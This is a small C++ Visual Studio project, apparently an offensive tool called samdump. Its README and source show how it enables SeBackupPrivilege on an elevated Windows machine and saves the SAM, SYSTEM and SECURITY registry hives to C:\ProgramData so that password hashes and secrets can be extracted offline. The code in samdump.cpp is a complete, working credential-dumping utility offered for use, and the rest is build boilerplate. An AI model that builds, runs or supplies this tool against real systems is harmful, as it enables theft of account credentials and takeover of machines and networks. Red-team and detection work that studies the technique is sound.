├── samdump
    ├── samdump.vcxproj.user
    ├── samdump.vcxproj.filters
    ├── samdump.cpp
    └── samdump.vcxproj
├── README.md
└── samdump.sln


/samdump/samdump.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup />
4 | </Project>


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # About
 2 | WinApi Dump SAM - SYSTEM - SECURITY registry keys for offline parsing and hash extraction.
 3 | 
 4 | ## Instructions
 5 | 
 6 | Compile and run `samdump.exe`:
 7 | 
 8 | ```
 9 | samdump\x64\release> samdump.exe
10 | ```
11 | 
12 | By default the output will be saved in the following files:
13 | 
14 | ```
15 | C:\ProgramData\sam.save - SAM
16 | C:\ProgramData\system.save - SYSTEM
17 | C:\ProgramData\security.save - SECURITY
18 | ```
19 | 
20 | You can modify the file names by changing `samdump.cpp`.
21 | 


--------------------------------------------------------------------------------
/samdump/samdump.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Archivos de origen">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Archivos de encabezado">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Archivos de recursos">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="samdump.cpp">
19 |       <Filter>Archivos de origen</Filter>
20 |     </ClCompile>
21 |   </ItemGroup>
22 | </Project>


--------------------------------------------------------------------------------
/samdump.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 16
 4 | VisualStudioVersion = 16.0.31005.135
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "samdump", "samdump\samdump.vcxproj", "{C076A991-4E22-47E8-B97C-9A700A5B234A}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{C076A991-4E22-47E8-B97C-9A700A5B234A}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{C076A991-4E22-47E8-B97C-9A700A5B234A}.Debug|x64.Build.0 = Debug|x64
18 | 		{C076A991-4E22-47E8-B97C-9A700A5B234A}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{C076A991-4E22-47E8-B97C-9A700A5B234A}.Debug|x86.Build.0 = Debug|Win32
20 | 		{C076A991-4E22-47E8-B97C-9A700A5B234A}.Release|x64.ActiveCfg = Release|x64
21 | 		{C076A991-4E22-47E8-B97C-9A700A5B234A}.Release|x64.Build.0 = Release|x64
22 | 		{C076A991-4E22-47E8-B97C-9A700A5B234A}.Release|x86.ActiveCfg = Release|Win32
23 | 		{C076A991-4E22-47E8-B97C-9A700A5B234A}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | 	GlobalSection(ExtensibilityGlobals) = postSolution
29 | 		SolutionGuid = {3309EE6C-B904-489D-A306-263C0DECA400}
30 | 	EndGlobalSection
31 | EndGlobal
32 | 


--------------------------------------------------------------------------------
/samdump/samdump.cpp:
--------------------------------------------------------------------------------
  1 | 
  2 | #include <iostream>
  3 | #include <windows.h>
  4 | 
  5 | BOOL IsElevated() {
  6 |     BOOL fRet = FALSE;
  7 |     HANDLE hToken = NULL;
  8 |     if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) {
  9 |         TOKEN_ELEVATION Elevation = { 0 };
 10 |         DWORD cbSize = sizeof(TOKEN_ELEVATION);
 11 |         if (GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &cbSize)) {
 12 |             fRet = Elevation.TokenIsElevated;
 13 |         }
 14 |     }
 15 |     if (hToken) {
 16 |         CloseHandle(hToken);
 17 |     }
 18 |     return fRet;
 19 | }
 20 | 
 21 | BOOL SetBackupPrivilege() {
 22 |     HANDLE hToken = NULL;
 23 |     TOKEN_PRIVILEGES TokenPrivileges = { 0 };
 24 | 
 25 |     if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken)) {
 26 |         return FALSE;
 27 |     }
 28 | 
 29 |     TokenPrivileges.PrivilegeCount = 1;
 30 |     TokenPrivileges.Privileges[0].Attributes = TRUE ? SE_PRIVILEGE_ENABLED : 0;
 31 | 
 32 |     LPCWSTR lpwPriv = L"SeBackupPrivilege";
 33 |     if (!LookupPrivilegeValueW(NULL, lpwPriv, &TokenPrivileges.Privileges[0].Luid)) {
 34 |         CloseHandle(hToken);
 35 |         return FALSE;
 36 |     }
 37 | 
 38 |     if (!AdjustTokenPrivileges(hToken, FALSE, &TokenPrivileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL)) {
 39 |         CloseHandle(hToken);
 40 |         return FALSE;
 41 |     }
 42 | 
 43 |     CloseHandle(hToken);
 44 |     return TRUE;
 45 | }
 46 | 
 47 | void dump_reg()
 48 | {
 49 |     HKEY hKey = 0x0;
 50 | 
 51 |     DWORD file_exist;
 52 | 
 53 |     //dump sam
 54 |     LPCWSTR lpSubKey = L"SAM";
 55 |     LPCWSTR	lpFile = L"C:\\ProgramData\\sam.save"; 
 56 |     RegOpenKeyEx(HKEY_LOCAL_MACHINE, lpSubKey, 0, 0x20000, &hKey);
 57 |     file_exist = RegSaveKeyExW(hKey, lpFile, 0x0, 2);
 58 | 
 59 |     //Check file exist
 60 |     if (file_exist == 183) {
 61 |         DeleteFileW(lpFile);
 62 |         RegSaveKeyW(hKey, lpFile, 0x0);
 63 |     }
 64 |     RegCloseKey(hKey);
 65 | 
 66 |     hKey = 0x0;
 67 |     //dump security
 68 |     lpSubKey = L"SECURITY";
 69 |     lpFile = L"C:\\ProgramData\\security.save";
 70 |     RegOpenKeyEx(HKEY_LOCAL_MACHINE, lpSubKey, 0, 0x20000, &hKey);
 71 |     file_exist = RegSaveKeyExW(hKey, lpFile, 0x0, 2);
 72 | 
 73 |     //Check file exist
 74 |     if (file_exist == 183) {
 75 |         DeleteFileW(lpFile);
 76 |         RegSaveKeyW(hKey, lpFile, 0x0);
 77 |     }
 78 |     RegCloseKey(hKey);
 79 | 
 80 |     hKey = 0x0;
 81 |     //dump system
 82 |     lpSubKey = L"SYSTEM";
 83 |     lpFile = L"C:\\ProgramData\\system.save";
 84 |     RegOpenKeyEx(HKEY_LOCAL_MACHINE, lpSubKey, 0, 0x20000, &hKey);
 85 |     file_exist = RegSaveKeyExW(hKey, lpFile, 0x0, 2);
 86 | 
 87 |     //Check file exist
 88 |     if (file_exist == 183) {
 89 |         DeleteFileW(lpFile);
 90 |         RegSaveKeyW(hKey, lpFile, 0x0);
 91 |     }
 92 |     RegCloseKey(hKey);
 93 | 
 94 | }
 95 | 
 96 | int main()
 97 | { 
 98 |     if (!IsElevated()) {
 99 |         std::cout << "[!] You need elevated privileges to run this tool!\n";
100 |         exit(1);
101 |     }
102 | 
103 |     SetBackupPrivilege();
104 |     std::cout << "[+] SeBackupPrivilege has been successfully activated.\n";
105 | 
106 |     dump_reg();
107 |     std::cout << "[+] Sam, System and Security dumped to C:\\ProgramData\\\n";
108 | }
109 | 
110 | 


--------------------------------------------------------------------------------
/samdump/samdump.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>16.0</VCProjectVersion>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <ProjectGuid>{c076a991-4e22-47e8-b97c-9a700a5b234a}</ProjectGuid>
 25 |     <RootNamespace>samdump</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |     <ProjectName>samdump</ProjectName>
 28 |   </PropertyGroup>
 29 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 30 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 31 |     <ConfigurationType>Application</ConfigurationType>
 32 |     <UseDebugLibraries>true</UseDebugLibraries>
 33 |     <PlatformToolset>v142</PlatformToolset>
 34 |     <CharacterSet>Unicode</CharacterSet>
 35 |   </PropertyGroup>
 36 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 37 |     <ConfigurationType>Application</ConfigurationType>
 38 |     <UseDebugLibraries>false</UseDebugLibraries>
 39 |     <PlatformToolset>v142</PlatformToolset>
 40 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 41 |     <CharacterSet>Unicode</CharacterSet>
 42 |   </PropertyGroup>
 43 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 44 |     <ConfigurationType>Application</ConfigurationType>
 45 |     <UseDebugLibraries>true</UseDebugLibraries>
 46 |     <PlatformToolset>v142</PlatformToolset>
 47 |     <CharacterSet>Unicode</CharacterSet>
 48 |   </PropertyGroup>
 49 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 50 |     <ConfigurationType>Application</ConfigurationType>
 51 |     <UseDebugLibraries>false</UseDebugLibraries>
 52 |     <PlatformToolset>v142</PlatformToolset>
 53 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 54 |     <CharacterSet>Unicode</CharacterSet>
 55 |   </PropertyGroup>
 56 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 57 |   <ImportGroup Label="ExtensionSettings">
 58 |   </ImportGroup>
 59 |   <ImportGroup Label="Shared">
 60 |   </ImportGroup>
 61 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 62 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 63 |   </ImportGroup>
 64 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 65 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 66 |   </ImportGroup>
 67 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 68 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 69 |   </ImportGroup>
 70 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 71 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 72 |   </ImportGroup>
 73 |   <PropertyGroup Label="UserMacros" />
 74 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 75 |     <LinkIncremental>true</LinkIncremental>
 76 |   </PropertyGroup>
 77 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 78 |     <LinkIncremental>false</LinkIncremental>
 79 |   </PropertyGroup>
 80 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 81 |     <LinkIncremental>true</LinkIncremental>
 82 |   </PropertyGroup>
 83 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 84 |     <LinkIncremental>false</LinkIncremental>
 85 |   </PropertyGroup>
 86 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 87 |     <ClCompile>
 88 |       <WarningLevel>Level3</WarningLevel>
 89 |       <SDLCheck>true</SDLCheck>
 90 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 91 |       <ConformanceMode>true</ConformanceMode>
 92 |     </ClCompile>
 93 |     <Link>
 94 |       <SubSystem>Console</SubSystem>
 95 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 96 |     </Link>
 97 |   </ItemDefinitionGroup>
 98 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 99 |     <ClCompile>
100 |       <WarningLevel>Level3</WarningLevel>
101 |       <FunctionLevelLinking>true</FunctionLevelLinking>
102 |       <IntrinsicFunctions>true</IntrinsicFunctions>
103 |       <SDLCheck>true</SDLCheck>
104 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
105 |       <ConformanceMode>true</ConformanceMode>
106 |     </ClCompile>
107 |     <Link>
108 |       <SubSystem>Console</SubSystem>
109 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
110 |       <OptimizeReferences>true</OptimizeReferences>
111 |       <GenerateDebugInformation>true</GenerateDebugInformation>
112 |     </Link>
113 |   </ItemDefinitionGroup>
114 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
115 |     <ClCompile>
116 |       <WarningLevel>Level3</WarningLevel>
117 |       <SDLCheck>true</SDLCheck>
118 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
119 |       <ConformanceMode>true</ConformanceMode>
120 |     </ClCompile>
121 |     <Link>
122 |       <SubSystem>Console</SubSystem>
123 |       <GenerateDebugInformation>true</GenerateDebugInformation>
124 |     </Link>
125 |   </ItemDefinitionGroup>
126 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
127 |     <ClCompile>
128 |       <WarningLevel>Level3</WarningLevel>
129 |       <FunctionLevelLinking>true</FunctionLevelLinking>
130 |       <IntrinsicFunctions>true</IntrinsicFunctions>
131 |       <SDLCheck>true</SDLCheck>
132 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
133 |       <ConformanceMode>true</ConformanceMode>
134 |     </ClCompile>
135 |     <Link>
136 |       <SubSystem>Console</SubSystem>
137 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
138 |       <OptimizeReferences>true</OptimizeReferences>
139 |       <GenerateDebugInformation>true</GenerateDebugInformation>
140 |     </Link>
141 |   </ItemDefinitionGroup>
142 |   <ItemGroup>
143 |     <ClCompile Include="samdump.cpp" />
144 |   </ItemGroup>
145 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
146 |   <ImportGroup Label="ExtensionTargets">
147 |   </ImportGroup>
148 | </Project>


--------------------------------------------------------------------------------